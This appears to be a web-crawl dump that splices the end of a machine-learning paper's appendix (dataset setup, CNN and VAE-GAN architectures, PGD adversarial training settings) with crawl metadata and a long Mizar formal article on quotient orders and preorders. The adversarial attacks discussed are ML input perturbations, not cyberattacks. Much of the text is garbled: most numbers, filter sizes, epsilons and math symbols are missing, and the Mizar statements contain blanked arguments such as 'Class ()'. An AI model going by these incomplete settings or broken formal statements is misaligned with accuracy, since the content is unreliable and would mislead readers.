al. (2017) Han Xiao, Kashif Rasul, and Roland Vollgraf. Fashion-mnist: a novel image dataset for benchmarking machine learning algorithms. arXiv preprint arXiv:1708.07747, 2017.\n• Zeiler & Fergus (2014) Matthew D Zeiler and Rob Fergus. Visualizing and understanding convolutional networks. In\n\nEuropean Conference on Computer Vision\n\n, pp. 818–833. Springer, 2014.\n• Zhang et al. (2019) Hongyang Zhang, Yaodong Yu, Jiantao Jiao, Eric P. Xing, Laurent El Ghaoui, and Michael I. Jordan. Theoretically principled trade-off between robustness and accuracy. arXiv preprint arXiv:1901.08573, 2019.\n\n## Appendix A Experiment Settings\n\n### a.1 Datasets\n\nThe toy dataset is comprised two classes. Each class consists of 3000 points sampled from a bivariate Gaussian distribution. The first distribution has mean and covariance matrix\n\n μ=[1.20.1],Σ=[−0.1−0.01−0.01−0.0002].\n\nThe second distribution has and the same covariance matrix. All four datasets toy dataset, MNIST, FMNIST and CIFAR-10 were normalized into range .\n\n### a.2 Classification Networks\n\nWe trained all the models with Adam with default settings , and\n\n. For the toy dataset, we trained a two-layer ReLU DNN for 10 epochs to achieve\n\ntest accuracy. For MNIST and FMNIST, we trained a ReLU CNN for 5 epochs to achieve and test accuracy, respectively. For CIFAR-10, we trained a ReLU CNN for 20 epochs to achieve test accuracy. The architectures for the classification models are given in the tables below. For dense layers, we write “Dense (number of units)”. For convolution layers, we write “Conv 2D (filter size, stride, number of filters)”\n\n. For max-pooling layers, we write\n\n“Max-pooling (window size, stride)”.\n\nToy Dataset DNN\nDense (128) ReLU\nDense (2)\nMNIST / FMNIST CNN\nConv 2D (, 1, ) ReLU\nConv 2D (, 1, ) ReLU\nMax-pooling (, 2)\nDense (1024) ReLU\nDense (10)\nCIFAR-10 CNN\nConv 2D (, 1, ) ReLU\nConv 2D (, 1, ) ReLU\nMax-pooling (, 2)\nConv 2D (, 1, ) ReLU\nConv 2D (, 1, ) ReLU\nMax-pooling (, 2)\nDense (256) ReLU\nDense (10)\n\n### a.3 VAE-GANs\n\nWe used a common encoder structure for MNIST, FMNIST and CIFAR-10. We set the latent dimension for MNIST and FMNIST and for CIFAR-10. In contrast to Larsen et al. (2016), for the reconstruction loss, we use the\n\ndistance, not the discriminator’s features. The architectures for VAE-GANs are given in the tables below. We reuse the notation for classification networks. Additionally, BN indicates batch normalization and for transposed convolution layers, we write\n\n“Deconv 2D (filter size, stride, number of filters)”.\n\nEncoder\nConv 2D (, 2, ) BN ReLU\nConv 2D (, 2, ) BN ReLU\nConv 2D (, 2, ) BN ReLU\nDense () BN\n\nMNIST / FMNIST. We used the decoder and discriminator structure given in Larsen et al. (2016). We trained the network with Adam with learning rate , , and 1 discriminator update per encoder and decoder update for 30 epochs for MNIST and 60 epochs for FMNIST.\n\nDecoder\nDense (1024) BN ReLU\nDeconv 2D (, 2, ) BN ReLU\nDeconv 2D (, 1, ) BN ReLU\nDeconv 2D (, 2, ) BN ReLU\nDeconv 2D (, 2, ) TanH\nDiscriminator\nConv 2D (, 2, ) ReLU\nConv 2D (, 2, ) BN ReLU\nConv 2D (, 2, ) BN ReLU\nConv 2D (, 2, ) BN ReLU\nDense (512) BN ReLU\nDense (1) Sigmoid\n\nCIFAR-10. We used the decoder and discriminator structure given in Miyato et al. (2018)\n\n. In the discriminator, we used spectral normalization (SN) with leaky ReLU (lReLU) activation functions with slopes set to 0.1. We trained the network with Adam learning rate\n\n, , and 5 discriminator updates per encoder and decoder update for 150 epochs.\n\nDecoder\nDense (8192)\nDeconv 2D (, 2, ) BN ReLU\nDeconv 2D (, 2, ) BN ReLU\nDeconv 2D (, 2, ) BN ReLU\nConv 2D (, 1, ) TanH\nDiscriminator\nConv 2D (, 1, ) SN lReLU\nConv 2D (, 2, ) SN lReLU\nConv 2D (, 1, ) SN lReLU\nConv 2D (, 2, ) SN lReLU\nConv 2D (, 1, ) SN lReLU\nConv 2D (, 2, ) SN lReLU\nConv 2D (, 1, ) SN lReLU\nDense (1) Sigmoid\n\nAll adversarial attacks in this paper were optimized to maximize the cross entropy loss or the CW surrogate objective with 40 iterations of PGD. Following previous works Tsipras et al. (2018) and Stutz et al. (2018), during adversarial training, we trained on adversarial images only. That is, we did not mix natural and adversarial images. We describe the adversarial training procedure and attack settings used in each section.\n\n### b.1 Section 2.1.\n\nFor MNIST and FMNIST, we trained DNNs against -bounded attacks with and -bounded attacks with . For CIFAR-10, we trained DNNs against -bounded attacks with and -bounded attacks with . The adversarial examples used for analysis are -bounded attacks with which maximize the cross entropy loss.\n\n### b.2 Section 2.2.\n\nWe trained the networks against -bounded attacks with (weak) and (strong). We visualized -bounded attacks with which maximize the cross entropy loss.\n\n### b.3 Sections 3.2 and 3.3.\n\nWe trained DNNs against or -bounded attacks of varying . For\n\n-bounded attacks, we linearly interpolated\n\nbetween and with step size . For -bounded attacks, we linearly interpolated between and with step size ." ]
[ null, "https://deepai.org/static/images/logo.png", null, "https://deepai.org/publication/None", null, "https://deepai.org/publication/None", null, "https://deepai.org/publication/None", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8793616,"math_prob":0.7891753,"size":32118,"snap":"2021-31-2021-39","text_gpt3_token_len":7307,"char_repetition_ratio":0.16861805,"word_repetition_ratio":0.12482007,"special_character_ratio":0.21277788,"punctuation_ratio":0.1377841,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95976776,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T17:42:08Z\",\"WARC-Record-ID\":\"<urn:uuid:056ec423-c55b-4fb4-a8ec-ef51e25933ba>\",\"Content-Length\":\"378197\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4a4c9488-2c88-430a-9523-cfa044a90775>\",\"WARC-Concurrent-To\":\"<urn:uuid:c1665346-dd74-47c8-82ce-502a2c11194e>\",\"WARC-IP-Address\":\"44.238.89.211\",\"WARC-Target-URI\":\"https://deepai.org/publication/bridging-adversarial-robustness-and-gradient-interpretability\",\"WARC-Payload-Digest\":\"sha1:2OAHURHNGODTEOMSOWVA2KM3MS4XLWIL\",\"WARC-Block-Digest\":\"sha1:KJP3GSHDEMNZF7CQDEBD2HRSUOI5XPV3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153739.28_warc_CC-MAIN-20210728154442-20210728184442-00043.warc.gz\"}"}
http://mizar.uwb.edu.pl/version/current/html/orders_5.html
[ ":: About Quotient Orders and Ordering Sequences\n:: by Sebastian Koch\n::\n:: Copyright (c) 2017-2021 Association of Mizar Users\n\n:: into SUBSET_1 ?\ntheorem Th1: :: ORDERS_5:1\nfor A, B being set\nfor x being object st A = B \\ {x} & x in B holds\nB \\ A = {x}\nproof end;\n\n:: into RELAT_1 ? present in FOMODEL0\nregistration\nlet Y be set ;\nlet X be Subset of Y;\ncoherence\nfor b1 being Relation st b1 is X -defined holds\nb1 is Y -defined\nby RELAT_1:182;\nend;\n\n:: placement in CARD_2 also seems appropriate because of CARD_2:60\ntheorem Th2: :: ORDERS_5:2\nfor X being set\nfor x being object st x in X & card X = 1 holds\n{x} = X\nproof end;\n\n:: into FINSEQ_1 ?\n:: interesting enough, trivdemo didn't recognized this one as trivial\ntheorem :: ORDERS_5:3\nfor X being set\nfor k being Nat st X c= Seg k holds\nrng (Sgm X) c= Seg k\nproof end;\n\n:: into FINSEQ_1 ?\nregistration\nlet s be FinSequence;\nlet N be Subset of (dom s);\ncluster (Sgm N) * s -> FinSequence-like ;\ncoherence\ns * (Sgm N) is FinSequence-like\nproof end;\nend;\n\n:: into FINSEQ_2 ?\n:: compare FINSEQ_2:32\nregistration\nlet A be set ;\nlet B be Subset of A;\nlet C be non empty set ;\nlet f be FinSequence of B;\nlet g be Function of A,C;\ncoherence\nproof end;\nend;\n\n:: into FINSEQ_2 ?\nregistration\nlet s be FinSequence;\ncluster (idseq (len s)) * s -> FinSequence-like ;\ncoherence\ns * (idseq (len s)) is FinSequence-like\nproof end;\nend;\n\n:: into FINSEQ_5 ?\nregistration\nlet s be FinSequence;\nreduce Rev (Rev s) to s;\nreducibility\nRev (Rev s) = s\n;\nend;\n\n:: into FINSET_1 ?\nscheme :: ORDERS_5:sch 1\nFinite2{ F1() -> set , F2() -> Subset of F1(), P1[ set ] } :\nP1[F1()]\nprovided\nA1: F1() is finite and\nA2: P1[F2()] and\nA3: for x, C being set st x in F1() \\ F2() & F2() c= C & C c= F1() & P1[C] holds\nP1[C \\/ {x}]\nproof end;\n\n:: into STRUCT_0 ?\n:: actually, I'm not sure why this redefinition is even needed by the analyzer\ndefinition\nlet S, T be 1-sorted ;\nlet f be Function of S,T;\nlet B be Subset of S;\n:: original: .:\nredefine func f .: B -> Subset of T;\ncoherence\nf .: B is Subset of T\nby FUNCT_2:36;\nend;\n\ntheorem :: ORDERS_5:4\ncanceled;\n\n::\\$CT\n:: into RVSUM_1 ?\ntheorem Th6: :: ORDERS_5:5\nfor s being FinSequence of REAL st Sum s <> 0 holds\nex i being Nat st\n( i in dom s & s . i <> 0 )\nproof end;\n\n:: into RVSUM_1 ?\n:: similar to RVSUM_1:85\ntheorem Th7: :: ORDERS_5:6\nfor s being FinSequence of REAL st s is nonnegative-yielding & ex i being Nat st\n( i in dom s & s . i <> 0 ) holds\nSum s > 0\nproof end;\n\n:: into RVSUM_1 ?\n:: used the preceeding proof to proof this one, which seemed to be both:\n:: a good exercise and a demonstration of symmetry\n:: However, a copy and paste proof would need less article references\ntheorem :: ORDERS_5:7\nfor s being FinSequence of REAL st s is nonpositive-yielding & ex i being Nat st\n( i in dom s & s . i <> 0 ) holds\nSum s < 0\nproof end;\n\n:: into RFINSEQ ?\ntheorem Th9: :: ORDERS_5:8\nfor X being set\nfor s, t being FinSequence of X\nfor f being Function of X,REAL st s is one-to-one & t is one-to-one & rng t c= rng s & ( for x being Element of X st x in (rng s) \\ (rng t) holds\nf . x = 0 ) holds\nSum (f * s) = Sum (f * t)\nproof end;\n\n:: into PARTFUN3 ?\nregistration\nlet X be set ;\nlet f be Function;\nlet g be positive-yielding Function of X,REAL;\ncoherence\nproof end;\nend;\n\n:: into PARTFUN3 ?\nregistration\nlet X be set ;\nlet f be Function;\nlet g be negative-yielding Function of X,REAL;\ncoherence\nproof end;\nend;\n\n:: into PARTFUN3 ?\nregistration\nlet X be set ;\nlet f be Function;\nlet g be nonpositive-yielding Function of X,REAL;\ncoherence\nproof end;\nend;\n\n:: into PARTFUN3 ?\nregistration\nlet X be set ;\nlet f be Function;\nlet g be nonnegative-yielding Function of X,REAL;\ncoherence\nproof end;\nend;\n\n:: into PRE_POLY ?\ndefinition\nlet s be Function;\n:: original: support\nredefine func support s -> Subset of (dom s);\ncoherence\nsupport s is Subset of (dom s)\nby PRE_POLY:37;\nend;\n\n::: into PRE_POLY ?\nregistration\nlet X be set ;\nexistence\nex b1 being Function of X,REAL st\n( b1 is finite-support & b1 is nonnegative-yielding )\nproof end;\nend;\n\n::: into PRE_POLY ?\nregistration\nlet X be set ;\nexistence\nex b1 being Function of X,COMPLEX st\n( b1 is nonnegative-yielding & b1 is finite-support )\nproof end;\nend;\n\n:: into CFUNCT_1 ?\ntheorem Th10: :: ORDERS_5:9\nfor A being set\nfor f being Function of A,COMPLEX holds support f = support (- f)\nproof end;\n\n:: into CFUNCT_1 ?\nregistration\nlet A be set ;\nlet f be finite-support Function of A,COMPLEX;\ncoherence\nproof end;\nend;\n\n:: into CFUNCT_1 as a consequence?\nregistration\nlet A be set ;\nlet f be finite-support Function of A,REAL;\ncoherence\nproof end;\nend;\n\ntheorem :: ORDERS_5:10\nfor X being set\nfor R being Relation\nfor Y being Subset of X st R is_irreflexive_in X holds\nR is_irreflexive_in Y\nproof end;\n\ntheorem :: ORDERS_5:11\nfor X being set\nfor R being Relation\nfor Y being Subset of X st R is_symmetric_in X holds\nR is_symmetric_in Y\nproof end;\n\ntheorem :: ORDERS_5:12\nfor X being set\nfor R being Relation\nfor Y being Subset of X st R is_asymmetric_in X holds\nR is_asymmetric_in Y\nproof end;\n\nTh16: for X being set\nfor R being Relation\nfor Y being Subset of X st R is_connected_in X holds\nR is_connected_in Y\n\nby ORDERS_1:76;\n\ndefinition\nlet A be RelStr ;\nattr A is connected means :Def1: :: ORDERS_5:def 1\nthe InternalRel of A is_connected_in the carrier of A;\nattr A is strongly_connected means :: ORDERS_5:def 2\nthe InternalRel of A is_strongly_connected_in the carrier of A;\nend;\n\n:: deftheorem Def1 defines connected ORDERS_5:def 1 :\nfor A being RelStr holds\n( A is connected iff the InternalRel of A is_connected_in the carrier of A );\n\n:: deftheorem defines strongly_connected ORDERS_5:def 2 :\nfor A being RelStr holds\n( A is strongly_connected iff the InternalRel of A is_strongly_connected_in the carrier of A );\n\nregistration\nexistence\nex b1 being RelStr st\n( not b1 is empty & b1 is reflexive & b1 is transitive & b1 is antisymmetric & b1 is connected & b1 is strongly_connected & b1 is strict & b1 is total )\nproof end;\nend;\n\nregistration\ncoherence\nfor b1 being RelStr st b1 is strongly_connected holds\n( b1 is reflexive & b1 is connected )\nproof end;\nend;\n\nregistration\ncoherence\nfor b1 being RelStr st b1 is reflexive & b1 is connected holds\nb1 is strongly_connected\nproof end;\nend;\n\nregistration\ncoherence\nfor b1 being RelStr st b1 is empty holds\n( b1 is reflexive & b1 is antisymmetric & b1 is transitive & b1 is connected & b1 is strongly_connected )\nproof end;\nend;\n\ndefinition\nlet A be RelStr ;\nlet a1, a2 be Element of A;\npred a1 =~ a2 means :Def3: :: ORDERS_5:def 3\n( a1 <= a2 & a2 <= a1 );\nend;\n\n:: deftheorem Def3 defines =~ ORDERS_5:def 3 :\nfor A being RelStr\nfor a1, a2 being Element of A holds\n( a1 =~ a2 iff ( a1 <= a2 & a2 <= a1 ) );\n\ntheorem Th22: :: ORDERS_5:13\nfor A being non empty reflexive RelStr\nfor a being Element of A holds a =~ a\nproof end;\n\ndefinition\nlet A be non empty reflexive RelStr ;\nlet a1, a2 be Element of A;\n:: original: =~\nredefine pred a1 =~ a2;\nreflexivity\nfor a1 being Element of A holds (A,b1,b1)\nby Th22;\nend;\n\ndefinition\nlet A be RelStr ;\nlet a1, a2 be Element of A;\npred a1 <~ a2 means :: ORDERS_5:def 4\n( a1 <= a2 & not a2 <= a1 );\nirreflexivity\nfor a1 being Element of A holds\n( not a1 <= a1 or a1 <= a1 )\n;\nend;\n\n:: deftheorem defines <~ ORDERS_5:def 4 :\nfor A being RelStr\nfor a1, a2 being Element of A holds\n( a1 <~ a2 iff ( a1 <= a2 & not a2 <= a1 ) );\n\nnotation\nlet A be RelStr ;\nlet a1, a2 be Element of A;\nsynonym a2 >~ a1 for a1 <~ a2;\nend;\n\ndefinition\nlet A be connected RelStr ;\nlet a1, a2 be Element of A;\n:: original: <~\nredefine pred a1 <~ a2;\nasymmetry\nfor a1, a2 being Element of A st (A,b1,b2) holds\nnot (A,b2,b1)\n;\nend;\n\ntheorem :: ORDERS_5:14\nfor A being non empty RelStr\nfor a1, a2 being Element of A holds\n( not A is strongly_connected or a1 <~ a2 or a1 =~ a2 or a1 >~ a2 )\nproof end;\n\ntheorem :: ORDERS_5:15\nfor A being transitive RelStr\nfor a1, a2, a3 being Element of A holds\n( ( a1 <~ a2 & a2 <= a3 implies a1 <~ a3 ) & ( a1 <= a2 & a2 <~ a3 implies a1 <~ a3 ) ) by ORDERS_2:3;\n\ntheorem Th25: :: ORDERS_5:16\nfor A being non empty RelStr\nfor a1, a2 being Element of A holds\n( not A is strongly_connected or a1 <= a2 or a2 <= a1 )\nproof end;\n\ntheorem Th26: :: ORDERS_5:17\nfor A being non empty RelStr\nfor B being Subset of A\nfor a1, a2 being Element of A st the InternalRel of A is_connected_in B & a1 in B & a2 in B & a1 <> a2 & not a1 <= a2 holds\na2 <= a1\nproof end;\n\ntheorem Th27: :: ORDERS_5:18\nfor A being non empty RelStr\nfor a1, a2 being Element of A st A is connected & a1 <> a2 & not a1 <= a2 holds\na2 <= a1\nproof end;\n\ntheorem :: ORDERS_5:19\nfor A being non empty RelStr\nfor a1, a2 being Element of A holds\n( not A is strongly_connected or a1 = a2 or a1 < a2 or a2 < a1 )\nproof end;\n\ntheorem Th29: :: ORDERS_5:20\nfor A being RelStr\nfor a1, a2 being Element of A st a1 <= a2 holds\n( a1 in the carrier of A & a2 in the carrier of A )\nproof end;\n\ntheorem :: ORDERS_5:21\nfor A being RelStr\nfor a1, a2 being Element of A st a1 <= a2 holds\nnot A is empty by Th29;\n\ntheorem Th31: :: ORDERS_5:22\nfor A being transitive RelStr\nfor B being finite Subset of A st not B is empty & the InternalRel of A is_connected_in B holds\nex x being Element of A st\n( x in B & ( for y being Element of A st y in B & x <> y holds\nx <= y ) )\nproof end;\n\ntheorem :: ORDERS_5:23\nfor A being transitive connected RelStr\nfor B being finite Subset of A st not B is empty holds\nex x being Element of A st\n( x in B & ( for y being Element of A st y in B & x <> y holds\nx <= y ) )\nproof end;\n\ntheorem Th33: :: ORDERS_5:24\nfor A being transitive RelStr\nfor B being finite Subset of A st not B is empty & the InternalRel of A is_connected_in B holds\nex x being Element of A st\n( x in B & ( for y being Element of A st y in B & x <> y holds\ny <= x ) )\nproof end;\n\ntheorem :: ORDERS_5:25\nfor A being transitive connected RelStr\nfor B being finite Subset of A st not B is empty holds\nex x being Element of A st\n( x in B & ( for y being Element of A st y in B & x <> y holds\ny <= x ) )\nproof end;\n\n:: I repeated some definitions here to have them all in one place\ndefinition end;\n\nregistration\ncoherence\nfor b1 being Preorder holds b1 is quasi_ordered\nby DICKSON:def 3;\nend;\n\nregistration\nexistence\nex b1 being LinearOrder st b1 is empty\nproof end;\nend;\n\ntheorem :: ORDERS_5:26\nfor A being Preorder holds the InternalRel of A quasi_orders the carrier of A\nproof end;\n\ntheorem :: ORDERS_5:27\nfor A being Order holds the InternalRel of A partially_orders the carrier of A\nproof end;\n\ntheorem Th37: :: ORDERS_5:28\nfor A being LinearOrder holds the InternalRel of A linearly_orders the carrier of A\nproof end;\n\ntheorem :: ORDERS_5:29\nfor A being RelStr st the InternalRel of A quasi_orders the carrier of A holds\n( A is reflexive & A is transitive ) by ;\n\ntheorem Th39: :: ORDERS_5:30\nfor A being RelStr st the InternalRel of A partially_orders the carrier of A holds\n( A is reflexive & A is transitive & A is antisymmetric ) by ;\n\ntheorem :: ORDERS_5:31\nfor A being RelStr st the InternalRel of A linearly_orders the carrier of A holds\n( A is reflexive & A is transitive & A is antisymmetric & A is connected )\nproof end;\n\nscheme :: ORDERS_5:sch 2\nRelStrMin{ F1() -> transitive connected RelStr , F2() -> finite Subset of F1(), P1[ Element of F1()] } :\nex x being Element of F1() st\n( x in F2() & P1[x] & ( for y being Element of F1() st y in F2() & y <~ x holds\nnot P1[y] ) )\nprovided\nA1: ex x being Element of F1() st\n( x in F2() & P1[x] )\nproof end;\n\nscheme :: ORDERS_5:sch 3\nRelStrMax{ F1() -> transitive connected RelStr , F2() -> finite Subset of F1(), P1[ Element of F1()] } :\nex x being Element of F1() st\n( x in F2() & P1[x] & ( for y being Element of F1() st y in F2() & x <~ y holds\nnot P1[y] ) )\nprovided\nA1: ex x being Element of F1() st\n( x in F2() & P1[x] )\nproof end;\n\ndefinition\nlet A be Preorder;\nfunc EqRelOf A -> Equivalence_Relation of the carrier of A means :Def6: :: ORDERS_5:def 6\nfor x, y being Element of A holds\n( [x,y] in it iff ( x <= y & y <= x ) );\nexistence\nex b1 being Equivalence_Relation of the carrier of A st\nfor x, y being Element of A holds\n( [x,y] in b1 iff ( x <= y & y <= x ) )\nproof end;\nuniqueness\nfor b1, b2 being Equivalence_Relation of the carrier of A st ( for x, y being Element of A holds\n( [x,y] in b1 iff ( x <= y & y <= x ) ) ) & ( for x, y being Element of A holds\n( [x,y] in b2 iff ( x <= y & y <= x ) ) ) holds\nb1 = b2\nproof end;\nend;\n\n:: deftheorem ORDERS_5:def 5 :\ncanceled;\n\n:: deftheorem Def6 defines EqRelOf ORDERS_5:def 6 :\nfor A being Preorder\nfor b2 being Equivalence_Relation of the carrier of A holds\n( b2 = EqRelOf A iff for x, y being Element of A holds\n( [x,y] in b2 iff ( x <= y & y <= x ) ) );\n\ntheorem Th41: :: ORDERS_5:32\nfor A being Preorder holds EqRelOf A = EqRel A\nproof end;\n\nregistration\nlet A be empty Preorder;\ncoherence\nEqRelOf A is empty\n;\nend;\n\nregistration\nlet A be non empty Preorder;\ncluster EqRelOf A -> non empty ;\ncoherence\nnot EqRelOf A is empty\n;\nend;\n\ntheorem Th42: :: ORDERS_5:33\nfor A being Order holds EqRelOf A = id the carrier of A\nproof end;\n\ndefinition\nlet A be Preorder;\nfunc QuotientOrder A -> strict RelStr means :Def7: :: ORDERS_5:def 7\n( the carrier of it = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of it iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) );\nexistence\nex b1 being strict RelStr st\n( the carrier of b1 = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of b1 iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) )\nproof end;\nuniqueness\nfor b1, b2 being strict RelStr st the carrier of b1 = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of b1 iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) & the carrier of b2 = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of b2 iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) holds\nb1 = b2\nproof end;\nend;\n\n:: deftheorem Def7 defines QuotientOrder ORDERS_5:def 7 :\nfor A being Preorder\nfor b2 being strict RelStr holds\n( b2 = QuotientOrder A iff ( the carrier of b2 = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of b2 iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) ) );\n\nregistration\nlet A be empty Preorder;\ncoherence\nproof end;\nend;\n\ntheorem Th43: :: ORDERS_5:34\nfor A being non empty Preorder\nfor x being Element of A holds Class ((),x) in the carrier of ()\nproof end;\n\nregistration\nlet A be non empty Preorder;\ncoherence\nnot QuotientOrder A is empty\nby Th43;\nend;\n\ntheorem Th44: :: ORDERS_5:35\nfor A being Preorder holds the InternalRel of () = <=E A\nproof end;\n\nregistration\nlet A be Preorder;\ncoherence\nproof end;\nend;\n\n:: this generalizes DICKSON:10 to possibly empty RelStr\nregistration\nlet A be LinearPreorder;\ncoherence\nproof end;\nend;\n\ndefinition\nlet A be Preorder;\nfunc proj A -> Function of A,() means :Def8: :: ORDERS_5:def 8\nfor x being Element of A holds it . x = Class ((),x);\nexistence\nex b1 being Function of A,() st\nfor x being Element of A holds b1 . x = Class ((),x)\nproof end;\nuniqueness\nfor b1, b2 being Function of A,() st ( for x being Element of A holds b1 . x = Class ((),x) ) & ( for x being Element of A holds b2 . x = Class ((),x) ) holds\nb1 = b2\nproof end;\nend;\n\n:: deftheorem Def8 defines proj ORDERS_5:def 8 :\nfor A being Preorder\nfor b2 being Function of A,() holds\n( b2 = proj A iff for x being Element of A holds b2 . x = Class ((),x) );\n\nregistration\nlet A be empty Preorder;\ncluster proj A -> empty ;\ncoherence\nproj A is empty\n;\nend;\n\nregistration\nlet A be non empty Preorder;\ncluster proj A -> non empty ;\ncoherence\nnot proj A is empty\n;\nend;\n\ntheorem Th45: :: ORDERS_5:36\nfor A being non empty Preorder\nfor x, y being Element of A st x <= y holds\n(proj A) . x <= (proj A) . y\nproof end;\n\ntheorem :: ORDERS_5:37\nfor A being Preorder\nfor x, y being Element of A st x =~ y holds\n(proj A) . x = (proj A) . y\nproof end;\n\ndefinition\nlet A be Preorder;\nlet R be Equivalence_Relation of the carrier of A;\nattr R is EqRelOf-like means :Def9: :: ORDERS_5:def 9\nR = EqRelOf A;\nend;\n\n:: deftheorem Def9 defines EqRelOf-like ORDERS_5:def 9 :\nfor A being Preorder\nfor R being Equivalence_Relation of the carrier of A holds\n( R is EqRelOf-like iff R = EqRelOf A );\n\nregistration\nlet A be Preorder;\ncorrectness\ncoherence ;\n;\nend;\n\nregistration\nlet A be Preorder;\ncluster Relation-like the carrier of A -defined the carrier of A -valued total quasi_total reflexive symmetric transitive EqRelOf-like for Element of K16(K17( the carrier of A, the carrier of A));\nexistence\nex b1 being Equivalence_Relation of the carrier of A st b1 is EqRelOf-like\nproof end;\nend;\n\ndefinition\nlet A be Preorder;\nlet R be EqRelOf-like Equivalence_Relation of the carrier of A;\nlet x be Element of A;\n:: original: Im\nredefine func Class (R,x) -> Element of ();\ncoherence\nIm (R,x) is Element of ()\nproof end;\nend;\n\ntheorem Th47: :: ORDERS_5:38\nfor A being Preorder holds the carrier of () is a_partition of the carrier of A\nproof end;\n\ntheorem Th48: :: ORDERS_5:39\nfor A being non empty Preorder\nfor D being non empty a_partition of the carrier of A st D = the carrier of () holds\nproj A = proj D\nproof end;\n\ndefinition\nlet A be set ;\nlet D be a_partition of A;\nfunc PreorderFromPartition D -> strict RelStr equals :: ORDERS_5:def 10\nRelStr(# A,(ERl D) #);\ncorrectness\ncoherence\nRelStr(# A,(ERl D) #) is strict RelStr\n;\n;\nend;\n\n:: deftheorem defines PreorderFromPartition ORDERS_5:def 10 :\nfor A being set\nfor D being a_partition of A holds PreorderFromPartition D = RelStr(# A,(ERl D) #);\n\nregistration\nlet A be non empty set ;\nlet D be a_partition of A;\ncoherence ;\nend;\n\nregistration\nlet A be set ;\nlet D be a_partition of A;\ncoherence ;\ncoherence\nproof end;\nend;\n\ntheorem Th49: :: ORDERS_5:40\nfor A being set\nfor D being a_partition of A holds ERl D = EqRelOf\nproof end;\n\nDef5: for A being set\nfor D being a_partition of A holds Class (ERl D) = D\n\nby PARTIT1:38;\n\ntheorem Th50: :: ORDERS_5:41\nfor A being set\nfor D being a_partition of A holds D = Class ()\nproof end;\n\ntheorem Th51: :: ORDERS_5:42\nfor A being set\nfor D being a_partition of A holds D = the carrier of\nproof end;\n\ndefinition\nlet A be set ;\nlet D be a_partition of A;\nlet X be Element of D;\nlet f be Function;\nfunc eqSupport (f,X) -> Subset of A equals :: ORDERS_5:def 11\n() /\\ X;\ncorrectness\ncoherence\n() /\\ X is Subset of A\n;\nproof end;\nend;\n\n:: deftheorem defines eqSupport ORDERS_5:def 11 :\nfor A being set\nfor D being a_partition of A\nfor X being Element of D\nfor f being Function holds eqSupport (f,X) = () /\\ X;\n\ndefinition\nlet A be Preorder;\nlet X be Element of ();\nlet f be Function;\nfunc eqSupport (f,X) -> Subset of A means :Def12: :: ORDERS_5:def 12\nex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & it = eqSupport (f,Y) );\nexistence\nex b1 being Subset of A ex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & b1 = eqSupport (f,Y) )\nproof end;\nuniqueness\nfor b1, b2 being Subset of A st ex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & b1 = eqSupport (f,Y) ) & ex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & b2 = eqSupport (f,Y) ) holds\nb1 = b2\n;\nend;\n\n:: deftheorem Def12 defines eqSupport ORDERS_5:def 12 :\nfor A being Preorder\nfor X being Element of ()\nfor f being Function\nfor b4 being Subset of A holds\n( b4 = eqSupport (f,X) iff ex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & b4 = eqSupport (f,Y) ) );\n\ndefinition\nlet A be Preorder;\nlet X be Element of ();\nlet f be Function;\nredefine func eqSupport (f,X) equals :: ORDERS_5:def 13\n() /\\ X;\ncorrectness\ncompatibility\nfor b1 being Subset of A holds\n( b1 = eqSupport (f,X) iff b1 = () /\\ X )\n;\nproof end;\nend;\n\n:: deftheorem defines eqSupport ORDERS_5:def 13 :\nfor A being Preorder\nfor X being Element of ()\nfor f being Function holds eqSupport (f,X) = () /\\ X;\n\nregistration\nlet A be set ;\nlet D be a_partition of A;\nlet f be finite-support Function;\nlet X be Element of D;\ncluster eqSupport (f,X) -> finite ;\ncorrectness\ncoherence\neqSupport (f,X) is finite\n;\n;\nend;\n\nregistration\nlet A be Preorder;\nlet f be finite-support Function;\nlet X be Element of ();\ncluster eqSupport (f,X) -> finite ;\ncorrectness\ncoherence\neqSupport (f,X) is finite\n;\n;\nend;\n\nregistration\nlet A be Order;\nlet X be Element of the carrier of ();\nlet f be finite-support Function of A,REAL;\ncluster eqSupport (f,X) -> trivial ;\ncoherence\neqSupport (f,X) is trivial\nproof end;\nend;\n\ntheorem Th52: :: ORDERS_5:43\nfor A being set\nfor D being a_partition of A\nfor X being Element of D\nfor f being Function of A,REAL holds eqSupport (f,X) = eqSupport ((- f),X)\nproof end;\n\ntheorem :: ORDERS_5:44\nfor A being Preorder\nfor X being Element of ()\nfor f being Function of A,REAL holds eqSupport (f,X) = eqSupport ((- f),X)\nproof end;\n\ndefinition\nlet A be set ;\nlet D be a_partition of A;\nlet f be finite-support Function of A,REAL;\nfunc D eqSumOf f -> Function of D,REAL means :Def14: :: ORDERS_5:def 14\nfor X being Element of D st X in D holds\nit . X = Sum (f * (canFS (eqSupport (f,X))));\nexistence\nex b1 being Function of D,REAL st\nfor X being Element of D st X in D holds\nb1 . X = Sum (f * (canFS (eqSupport (f,X))))\nproof end;\nuniqueness\nfor b1, b2 being Function of D,REAL st ( for X being Element of D st X in D 